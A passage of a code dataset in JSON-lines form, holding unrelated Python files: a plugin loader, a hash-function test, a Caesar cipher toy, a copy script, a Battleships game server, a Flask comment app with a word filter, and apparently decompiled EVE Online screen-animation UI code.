result.append(handler)\n return result\n\n\ndef _import_module(filename):\n (path, name) = os.path.split(filename)\n (name, ext) = os.path.splitext(name)\n\n (file, filename, data) = imp.find_module(name, [path])\n try:\n return imp.load_module(name, file, filename, data)\n finally:\n if file:\n file.close()\n\n_plugin_loaded = False\n\n\ndef load_plugins(config):\n global _plugin_loaded\n if _plugin_loaded:\n return\n _plugin_loaded = True\n\n if not config.has_option('Plugin', 'plugin_directory'):\n return\n directory = config.get('Plugin', 'plugin_directory')\n for file in glob.glob(os.path.join(directory, '*.py')):\n _import_module(file)\n","repo_name":"silveregg/txboto","sub_path":"txboto/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34962323512","text":"import string\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef process_word(w):\n w = w.rstrip()\n w2 = [char for char in w if char in string.ascii_letters]\n return \"\".join(w2).upper()\n\nraw_words = random.sample(open(\"/usr/share/dict/words\", \"rt\").readlines(), 100)\nwords = [pw for pw in [process_word(w) for w in raw_words] if pw]\n\n\ndef create_labelname(idx):\n w1 = random.choice(words)\n w2 = \"\" # random.choice(words)\n name = (w1+w2)[:25].upper()\n return name + \".\" + str(idx) + random.choice(string.ascii_uppercase+string.digits)\n\n\nnumber_of_labels = 5000\nlabels = [create_labelname(idx) for idx in range(number_of_labels)]\n\n\ndef hashfunc1(label):\n length = len(label) # assume we know the length of the symbol already\n c0 = ord(label[0])\n c1 = ord(label[1])\n clast = ord(label[length-1])\n return ((c0 + clast + c1*4) ^ (length*4)) & 127\n\n\ndef hashfunc2(label):\n # just sum up all the characters of the label....\n # could be faster / better if you have to scan it anyway to determine the length\n # also seems to work better for shorter labels\n length=len(label)\n return (sum([ord(c) for c in label]) ^ (length*2)) & 127\n\ndef hashfunc3(label):\n # this is the string.hash function in the prog8 string library\n hashcode = 179\n carry = 0\n for c in label:\n newcarry = 1 if hashcode&128 else 0\n hashcode = (hashcode << 1) & 255 | carry\n carry = newcarry\n hashcode ^= ord(c)\n return hashcode\n\n\nif __name__==\"__main__\":\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc1(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n p=sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc2(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 256\n for lbl in labels:\n hashvalue = hashfunc3(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n","repo_name":"irmen/cx16assem","sub_path":"experiment/hashed_syms/hashfunctionstest.py","file_name":"hashfunctionstest.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"29418139191","text":"import os\r\n\r\n\r\nos.system('cls')\r\n\r\n\r\n\r\nprint('''\r\n ##################################################\r\n # #\r\n # caesar_encode by : Welson #\r\n # #\r\n ##################################################\r\n\r\n''')\r\n\r\n\r\ndef encode():\r\n print('Starting encode')\r\n print('输入你想要输入的明文' )\r\n txt = input(\">>\")\r\n print('请输入移动位数')\r\n offset = int(input(\">>\"))\r\n\r\n\r\n #考虑用户用的是字符串\r\n result = \"\"\r\n\r\n for t in txt:\r\n n = ord(t)\r\n n = n + offset\r\n t2 = chr(n)\r\n result = result + t2\r\n \r\n print(f'加密后的字符是 {result}')\r\n\r\ndef decode():\r\n print('Starting decode')\r\n print('输入你要解密的密文' )\r\n cipher = input('>>')\r\n print(\"请输入秘钥.\")\r\n key = int(input('>'))\r\n \r\n plain = \"\"\r\n\r\n \r\n for c in cipher:\r\n n = ord(c)\r\n n = n - key\r\n p = chr(n)\r\n plain += p\r\n\r\n print(f'解密后的明文是:{plain}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\nrunning = True\r\nwhile running:\r\n print('1.Encode 2.decode 3.Exit')\r\n sel = input(\">>\")\r\n if sel == '1':\r\n encode()\r\n elif sel == '2':\r\n decode()\r\n elif sel == '3':\r\n print(\"Thank you for use this app!\")\r\n running = False\r\n else:\r\n print('请做出正确的选择。 ')\r\n \r\n \r\n","repo_name":"Welsonpeaches/caeser_encode","sub_path":"caesar_encode_decode.py","file_name":"caesar_encode_decode.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13117134710","text":"import argparse\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser(\n description='Copy files form one folder to another',\n prog='copy_script'\n)\ndef main():\n parser.add_argument(\n '-s', \n '--source-dir', \n default=\".\",\n help=\"Source directory from where files should be copied\"\n )\n parser.add_argument(\n '-d', \n '--destination-dir', \n default=\".\", \n help=\"Source directory from where files should be copied\"\n )\n args = parser.parse_args()\n if args.source_dir == \".\" and args.destination_dir == \".\" :\n parser.print_help()\n else:\n copy_tree(args.source_dir,args.destination_dir)\n print(f\"Copied files from {args.source_dir} to {args.destination_dir}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"HubGab-Git/copy_script","sub_path":"python/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70454123610","text":"#server\r\n\r\nimport sys\r\nimport player\r\nimport threading\r\nimport traceback\r\nfrom socket import *\r\nimport gameserver as gs\r\nfrom random import randint\r\nimport securedsocket as ss\r\nimport configurationmanager as cm\r\n\r\nPORT = randint(0,5000) \t\t# starts from a random port\r\n\r\n\r\ndef get_new_socket(player_socket):\r\n\tglobal PORT\r\n\tPORT += 1\r\n\tport_min = cm.tcp_server_min_port\r\n\tport_max = cm.tcp_server_max_port\r\n\ttcp_port = (port_min + PORT) % port_max\r\n\r\n\ttemp_socket = socket(AF_INET, SOCK_STREAM)\r\n\ttemp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\r\n\ttry:\r\n\t\tplayer_socket.send(str(tcp_port))\r\n\t\ttemp_socket.bind(('', tcp_port))\r\n\t\ttemp_socket.listen(15)\r\n\t\tnew_player_socket,address = temp_socket.accept()\r\n\texcept socket.timeout:\r\n\t\tprint(\"Socket timeout. Port may have been used recently. wait and try again!\")\r\n\t\treturn None,tcp_port\r\n\texcept:\r\n\t\tprint(\"Socket error. Try again\")\r\n\t\treturn None,tcp_port\r\n\tfinally:\r\n\t\ttemp_socket.close()\r\n\treturn ss.RSASocket(new_player_socket),address\r\n\r\n\r\n# creates a server side player_object\r\ndef prepare_player(player_socket,game_server):\r\n\tname = player_socket.recv(1024)\r\n\tnew_player_socket = None\r\n\twhile not new_player_socket:\r\n\t\tnew_player_socket,new_address = get_new_socket(player_socket)\r\n\r\n\tudp_sending = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_sending[1:-1].split(\",\")\r\n\tudp_address_sending = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tudp_receiving = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_receiving[1:-1].split(\",\")\r\n\tudp_address_receiving = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tp = player.Player(name,new_player_socket,new_address,udp_address_sending,udp_address_receiving)\r\n\r\n\tgame_server.add_player(p)\r\n\tplayer_socket.close()\r\n\r\n# to use the UDP socket\r\ndef ping_response():\r\n\tping_socket = socket(AF_INET, SOCK_DGRAM)\r\n\tping_socket.bind(('', cm.udp_ping_port)) # for pinging\r\n\twhile not server_quitting:\r\n\t\tmsg,address = ping_socket.recvfrom(1024)\r\n\t\tif (msg.decode() == \"OPEN\"):\r\n\t\t\tping_socket.sendto(msg,address)\r\n\tping_socket.close()\r\n\r\n\r\n# \r\ndef main():\r\n\tglobal server_quitting \t\t\t\t\t\t\t\t# for the future\r\n\tthreads = []\r\n\tgame_server = None\r\n\r\n\ttry:\r\n\t\tserver_quitting = False\r\n\r\n\t\t# this is to verify if the server is up (UPD)\r\n\t\tt = threading.Thread(target=ping_response)\r\n\t\tt.start()\r\n\t\tthreads.append(t)\r\n\r\n\t\tmaximum_connected = cm.maximum_connected\r\n\t\tserver_socket = socket(AF_INET,SOCK_STREAM)\r\n\t\tserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\t\tserver_socket.bind(('',cm.tcp_server_port)) \t\t\t\t# game socket\r\n\t\tserver_socket.listen(maximum_connected)\r\n\r\n\t\tchat_socket = socket(AF_INET, SOCK_DGRAM)\r\n\t\tchat_socket.bind(('', cm.udp_server_port))\t\t\t\t\t# chat room socket\r\n\t\tchat_socket = ss.RSASocket(chat_socket)\r\n\r\n\t\t# create the game server\r\n\t\tgame_server = gs.TheGameServer(maximum_connected,chat_socket)\r\n\t\t\r\n\t\t# entry door for incoming players\r\n\t\twhile not server_quitting:\r\n\t\t\tplayersocket, addr = server_socket.accept()\r\n\t\t\tif (not server_quitting):\r\n\t\t\t\tss_socket = ss.RSASocket(playersocket)\r\n\t\t\t\tt = threading.Thread(target=prepare_player,args=(ss_socket,game_server))\r\n\t\t\t\tt.start()\r\n\t\t\t\tthreads.append(t)\r\n\t\t\t\tprint(\"New player registered and waiting for more\")\r\n\t\t\telse: \r\n\t\t\t\t# no more connections allowed\r\n\t\t\t\tplayersocket.send(\"no more connections allowed\".encode())\r\n\t\t\t\tplayersocket.close()\r\n\texcept KeyboardInterrupt:\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tgame_down = True\r\n\t\tprint(\"Keyboard Interrupt. Time to say goodbye!!!\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\ttraceback.print_exc(file=sys.stdout)\r\n\tfinally:\r\n\t\tfor t in threads:\r\n\t\t\tt.join()\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tprint(\"Waiting for all active games to finish\")\r\n\tprint(\"The end\")\r\n\tsys.exit(0) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","repo_name":"gautam-balamurali/Multiplayer-Battleships","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13652689583","text":"# from flask import Flask\n# from flask import request,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlite3\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport parser\n\n# FOllowed\n#https://github.com/mitsuhiko/flask/blob/master/examples/flaskr/flaskr.py\nDATABASE = 'Data/flask.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n\n\"\"\"\nCode to initialize the database\n\"\"\"\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('Data/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\"\"\"\nCode to connect to our database\n\"\"\"\ndef connect_db():\n rv = sqlite3.connect('DATABASE')\n rv.row_factory = sqlite3.Row\n return rv\n # return sqlite3.connect('DATABASE')\n\n\"\"\"\nCode to get our db so we can get entries\n\"\"\"\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\"\"\"\nCode to close your databse\n\"\"\"\n@app.teardown_appcontext\ndef close_connection(exception):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n\"\"\"\nLanding page will just have assignments and will render index.html\n\"\"\"\n@app.route('/')\ndef landing():\n svn_list = parser.parse_svn()\n db = get_db()\n cur = db.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('index.html',svn_list=svn_list[0],svn_log=svn_list[1],entries=entries)\n\n\n\n\"\"\"\niframe redirect page will add comments we will check if the comment\nis a original comment or reply and add to corresponding data base\nwe will also filter and check that naughty words are not being used\n\"\"\"\n@app.route('/add//', methods=['POST'])\ndef add_entry(directory,path):\n db = get_db()\n unique_file = directory + \"-\" + path\n if request.form['text'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n if request.form['title'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n\n if request.form['reply'] == \"\":\n title = request.form['title']\n text = request.form['text']\n title,text = filter(request.form['title'],request.form['text'])\n db.execute('insert into entries (title, text,file) values (?, ?, ?)',\n [title, text,unique_file])\n db.commit()\n else:\n title = request.form['title']\n text = request.form['text']\n reply = request.form['reply']\n title,text = filter(request.form['title'],request.form['text'])\n print('This is STUPID')\n db.execute('insert into reply_entries (parent_id,title, text,file) values (?, ?, ?,?)',\n [str(reply),title, text,unique_file])\n db.commit()\n return redirect(url_for('iframe',path=path,directory=directory))\n\n\"\"\"\nFor when you click on a specific assignment\ngives you details about all files in assignment\n\"\"\"\n@app.route('/')\ndef files(files):\n svn_list = parser.parse_svn()\n return render_template('details.html',svn_list=svn_list[0],\n svn_log=svn_list[1],assignment=files)\n\n\n\"\"\"\niframe page will display comments so we will get tables from etnries and reply_entries table\n\"\"\"\n@app.route('//')\ndef iframe(directory,path):\n svn_list = parser.parse_svn()\n db = get_db()\n # filter(request.form['title'],request.form['text'])\n\n db.commit()\n comment = db.execute('select title, text, file,id from entries order by id desc')\n replies = db.execute('select title,text,parent_id from reply_entries order by child_id desc')\n\n entries = comment.fetchall()\n replies = replies.fetchall()\n return render_template('show_entries.html',svn_list=svn_list[0],svn_log=svn_list[1],\n path=path,directory=directory,entries=entries,replies=replies)\n\n\"\"\"\nFilter function will check naught words table and check text and title\nand will replace any naught words\n\"\"\"\ndef filter(title,text):\n db = get_db()\n cur = db.execute('select * from naughty_words')\n replace = cur.fetchall()\n for word in replace:\n if word[0] in title:\n title = title.replace(word[0],word[1])\n if word[0] in text:\n text = text.replace(word[0],word[1])\n return title,text\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"alekfestekjian/WebPortfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33638891933","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/station/captainsquarters/screenControls.py\nimport blue\nimport trinity\nimport uicls\nimport uiconst\nimport uthread\nimport uiutil\nimport util\nimport math\nimport random\nTIME_BASE = 0.3\n\nclass ScreenWedgeBracketTop(uicls.Transform):\n __guid__ = 'uicls.ScreenWedgeBracketTop'\n default_name = 'ScreenWedgeBracketTop'\n default_hasCorners = True\n default_wedgeWidth = 100\n default_wedgeTopStart = -10\n default_wedgePosRatio = 0.5\n default_align = uiconst.TOTOP\n default_height = 25\n default_rotation = 0.0\n\n def ApplyAttributes(self, attributes):\n global TIME_BASE\n uicls.Transform.ApplyAttributes(self, attributes)\n TIME_BASE = 0.3\n self.hasCorners = attributes.get('hasCorners', self.default_hasCorners)\n wedgeWidth = attributes.get('wedgeWidth', self.default_wedgeWidth)\n wedgeTopStart = attributes.get('wedgeTopStart', self.default_wedgeTopStart)\n self.wedgePosRatio = attributes.get('wedgePosRatio', self.default_wedgePosRatio)\n self.borderLeft = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderLeft.png', cornerSize=16, align=uiconst.TOPLEFT, pos=(0, 1, 200, 48), padLeft=2, color=util.Color.WHITE)\n self.wedge = uicls.Frame(parent=self, name='wedge', texturePath='res:/UI/Texture/classes/CQMainScreen/wedge.png', cornerSize=13, align=uiconst.TOPLEFT, pos=(300,\n wedgeTopStart,\n wedgeWidth,\n 27), padding=(-5, 0, -5, 0), color=util.Color.WHITE)\n self.borderRight = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderRight.png', cornerSize=16, align=uiconst.TOPRIGHT, pos=(0, 1, 200, 48), padRight=2, color=util.Color.WHITE)\n if self.hasCorners:\n self.cornerLeft = uicls.Sprite(parent=self, name='cornerLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerLeft.png', pos=(0, 0, 22, 22))\n self.cornerRight = uicls.Sprite(parent=self, name='cornerRight', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerRight.png', pos=(0, 0, 22, 22), align=uiconst.TOPRIGHT)\n\n def _OnResize(self):\n if not hasattr(self, 'wedge'):\n return\n self.UpdatePosition()\n\n def UpdatePosition(self):\n w, h = self.GetAbsoluteSize()\n self.wedge.left = (w - self.wedge.width) * self.wedgePosRatio\n self.borderLeft.width = self.wedge.left\n self.borderRight.width = w - self.wedge.left - self.wedge.width\n\n def AnimAppear(self):\n if self.hasCorners:\n uicore.animations.FadeIn(self.cornerLeft, duration=TIME_BASE / 3, loops=3)\n uicore.animations.FadeIn(self.cornerRight, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.FadeIn(self.borderLeft, duration=TIME_BASE)\n uicore.animations.FadeIn(self.borderRight, duration=TIME_BASE)\n uicore.animations.FadeIn(self.wedge, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.wedge, 'top', self.wedge.top, 0, duration=TIME_BASE, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self)\n\n\nclass ScreenWedgeBracketBottom(ScreenWedgeBracketTop):\n __guid__ = 'uicls.ScreenWedgeBracketBottom'\n default_name = 'ScreenWedgeBracketBottom'\n default_align = uiconst.TOBOTTOM\n default_rotation = math.pi\n\n\nclass ScreenSimpleBracketTop(uicls.Frame):\n __guid__ = 'uicls.ScreenSimpleBracketTop'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketTop.png'\n default_cornerSize = 21\n default_align = uiconst.TOTOP\n default_height = 21\n default_color = util.Color.WHITE\n\n def AnimAppear(self):\n uicore.animations.FadeIn(self, duration=TIME_BASE)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self, duration=TIME_BASE)\n\n\nclass ScreenSimpleBracketBottom(ScreenSimpleBracketTop):\n __guid__ = 'uicls.ScreenSimpleBracketBottom'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketBottom.png'\n default_align = uiconst.TOBOTTOM\n\n\nclass ScreenFrameBase(uicls.Container):\n __guid__ = 'uicls._ScreenFrameBase'\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.bracketLayer = uicls.Container(name='bracketCont', parent=self)\n self.mainCont = uicls.Container(name='mainCont', parent=self)\n self.topBracket = None\n self.bottomBracket = None\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n w, h = self.GetAbsoluteSize()\n uicore.animations.MorphScalar(self.topBracket, 'padTop', h / 2, 0, duration=TIME_BASE)\n uicore.animations.MorphScalar(self.bottomBracket, 'padBottom', h / 2, 0, duration=TIME_BASE, sleep=True)\n for obj in self.bracketLayer.children:\n uthread.new(obj.AnimAppear)\n blue.pyos.synchro.SleepWallclock(200)\n\n blue.pyos.synchro.SleepWallclock(2000)\n for c in self.mainCont.children:\n if hasattr(c, 'AnimAppear'):\n uthread.new(c.AnimAppear)\n\n\nclass ScreenFrame1(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame1'\n default_name = 'ScreenFrame1'\n\n def ApplyAttributes(self, attributes):\n uicls._ScreenFrameBase.ApplyAttributes(self, attributes)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=math.pi, align=uiconst.TOBOTTOM)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=0)\n\n\nclass ScreenFrame2(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame2'\n default_name = 'ScreenFrame2'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame3(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame3'\n default_name = 'ScreenFrame3'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n\n\nclass ScreenFrame4(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame4'\n default_name = 'ScreenFrame4'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame5(ScreenFrame1):\n __guid__ = 'uicls.ScreenFrame5'\n default_name = 'ScreenFrame5'\n\n def ApplyAttributes(self, attributes):\n ScreenFrame1.ApplyAttributes(self, attributes)\n ScreenBlinkingSquares(parent=self.bracketLayer, padLeft=50, padBottom=-5, padRight=15)\n\n\nclass ScreenHeading1(uicls.Container):\n __guid__ = 'uicls.ScreenHeading1'\n default_name = 'ScreenHeading1'\n default_align = uiconst.TOTOP\n default_fillColor = (0.180392157, 0.219607843, 0.239215686, 1.0)\n default_gradientColor = (0.152941176, 0.168627451, 0.17254902, 1.0)\n default_leftContWidth = 60\n default_height = 60\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n fillColor = attributes.get('fillColor', self.default_fillColor)\n gradientColor = attributes.get('gradientColor', self.default_gradientColor)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n appear = attributes.get('appear', False)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n uicls.Fill(name='leftBg', bgParent=self.leftCont, color=fillColor)\n self.mainCont = uicls.Container(name='mainCont', parent=self, padLeft=0, padRight=0)\n gradient = uicls.Sprite(name='rightGradient', bgParent=self.mainCont, color=gradientColor, texturePath='res:/UI/Texture/classes/CQMainScreen/gradientHoriz.png')\n if appear:\n uthread.new(self.AnimAppear)\n else:\n self.opacity = 0.0\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n w, h = self.GetAbsoluteSize()\n self.opacity = 1.0\n uicore.animations.MorphScalar(self.leftCont, 'displayWidth', 0, self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.leftCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.mainCont, 'displayWidth', 0, w - self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.mainCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n\n\nclass ScreenHeading2(uicls.Container):\n __guid__ = 'uicls.ScreenHeading2'\n default_name = 'ScreenHeading2'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n default_hasBargraph = True\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.hasBargraph = attributes.get('hasBargraph', self.default_hasBargraph)\n rightCont = uicls.Container(name='rightCont', parent=self, align=uiconst.TORIGHT, width=446, padBottom=5)\n uicls.Sprite(name='rightGraphics', parent=rightCont, align=uiconst.TOBOTTOM, texturePath='res:/UI/Texture/classes/CQMainScreen/heading2.png', height=14)\n uicls.Fill(name='thickLine', parent=self, align=uiconst.TOBOTTOM, height=6, padBottom=9, color=util.Color.WHITE)\n self.label = uicls.Label(parent=self, text=text, top=10, fontsize=30, color=util.Color.WHITE)\n self.movingFill = uicls.Fill(name='movingFill', parent=self, align=uiconst.BOTTOMRIGHT, pos=(0, 0, 100, 3), color=util.Color.WHITE)\n if self.hasBargraph:\n barGraphCont = uicls.Container(name='bargraphCont', parent=self, align=uiconst.TOPRIGHT, pos=(10, 8, 332, 31))\n self.barGraph = uicls.Sprite(name='barGraph', parent=barGraphCont, texturePath='res:/UI/Texture/classes/CQMainScreen/barGraph.png', align=uiconst.CENTER, width=barGraphCont.width, height=31)\n self.barGraph.color.a = 0.6\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uicore.animations.MorphScalar(self.movingFill, 'left', 0, 244, loops=uiconst.ANIM_REPEAT, curveType=uiconst.ANIM_WAVE, duration=2.0)\n if self.hasBargraph:\n uicore.animations.MorphScalar(self.barGraph, 'height', 0, 45, curveType=uiconst.ANIM_RANDOM, duration=1.0)\n\n\nclass ScreenHeading3(uicls.Container):\n __guid__ = 'uicls.ScreenHeading3'\n default_name = 'ScreenHeading3'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.label = uicls.EveLabelMedium(parent=self, align=uiconst.CENTER, fontsize=self.height - 25, text=text)\n uicls.Fill(bgParent=self, color=(0.5, 0.5, 0.5, 1.0))\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n uicore.animations.BlinkIn(self, sleep=True)\n uicore.animations.BlinkIn(self.label, sleep=True)\n uicore.animations.MorphScalar(self.label, 'opacity', startVal=1.0, endVal=0.5, curveType=uiconst.ANIM_WAVE, loops=uiconst.ANIM_REPEAT)\n\n\nclass ScreenBlinkingSquares(uicls.Container):\n __guid__ = 'uicls.ScreenBlinkingSquares'\n default_name = 'ScreenBlinkingSquares'\n default_height = 10\n default_align = uiconst.TOBOTTOM\n default_opacity = 0.0\n default_padBottom = 10\n default_padLeft = 10\n default_padRight = 10\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n left1 = uicls.Fill(name='left1', parent=self, align=uiconst.TOLEFT, width=8, padBottom=5, color=util.Color.WHITE)\n left2 = uicls.Fill(name='left2', parent=self, align=uiconst.TOLEFT, width=30, padLeft=3, color=util.Color.WHITE)\n left3 = uicls.Fill(name='left3', parent=self, align=uiconst.TOLEFT, width=8, padLeft=3, color=util.Color.WHITE)\n self.label = uicls.EveLabelSmall(parent=self, align=uiconst.TOLEFT, width=100, padLeft=5)\n self.right1 = uicls.Fill(name='right1', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE)\n self.right2 = uicls.Fill(name='right2', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n self.right3 = uicls.Fill(name='right3', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uthread.new(self.UpdateBitCounter)\n uthread.new(self.UpdateText)\n\n def UpdateText(self):\n x1 = 10000\n x2 = 30000\n msgList = ['59 4F 55 20',\n '48 41 56 45',\n '20 57 41 59',\n '20 54 4F 4F',\n '20 4D 55 43',\n '48 20 54 49',\n '4D 45 20 4F',\n '4E 20 59 4F',\n '55 52 20 48',\n '41 4E 44 53']\n while not self.destroyed:\n for msg in msgList:\n self.label.text = '%s' % msg\n uicore.animations.FadeIn(self.label, duration=TIME_BASE / 3, loops=3)\n blue.pyos.synchro.SleepWallclock(random.randint(1000, 2000))\n if self.label.destroyed:\n return\n\n def UpdateBitCounter(self):\n count = 0\n while not self.destroyed:\n val = max(0.2, count & 1)\n uicore.animations.FadeTo(self.right1, self.right1.opacity, val)\n val = max(0.2, count >> 1 & 1)\n uicore.animations.FadeTo(self.right2, self.right2.opacity, val)\n val = max(0.2, count >> 2 & 1)\n uicore.animations.FadeTo(self.right3, self.right3.opacity, val)\n count += 1\n if count == 8:\n count = 0\n blue.pyos.synchro.SleepWallclock(1000)\n\n\nclass AutoTextScroll(uicls.Container):\n __guid__ = 'uicls.AutoTextScroll'\n default_name = 'AutoScrollHorizontal'\n default_scrollSpeed = 10\n default_clipChildren = True\n default_textList = None\n default_fontSize = 30\n default_fadeColor = util.Color.BLACK\n default_fadeWidth = 100\n default_color = util.Color.WHITE\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n textList = attributes.get('textList', self.default_textList)\n self.scrollSpeed = attributes.get('scrollSpeed', self.default_scrollSpeed)\n self.fontSize = attributes.get('fontSize', self.default_fontSize)\n fadeColor = attributes.get('fadeColor', self.default_fadeColor)\n fadeWidth = attributes.get('fadeWidth', self.default_fadeWidth)\n self.color = attributes.get('color', self.default_color)\n self.scrollThread = None\n if fadeColor:\n uicls.Sprite(name='leftFade', parent=self, 